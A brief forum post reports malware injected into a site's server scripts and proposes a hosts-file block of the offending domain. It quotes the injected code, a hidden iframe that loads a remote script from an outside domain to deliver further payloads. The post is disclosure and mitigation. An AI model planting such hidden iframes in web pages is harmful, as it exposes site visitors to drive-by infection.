This really looks like malware in scripts on the server
Unfortunately I don't have a server login and its a little hard for me to fix it, have to wait for encode/webmaster to notice.
The script adds
Code:
<div style="display:none;"><iframe src="http://kokosina.in/t/go.php?sid=5" width="38" height="67" border="0" frameborder="0"></iframe></div>
to the page code for some browsers. That loads and decrypts some javascripts, which in turn tries to load a java plugin and does other stuff.
Anyway, a proposed fix for now is to add
Code:
127.0.0.1 kokosina.in
to C:\WINDOWS\system32\drivers\etc\hosts
Update: redirected to a clean copy for now. Encode, webmaster, please fix this anyway.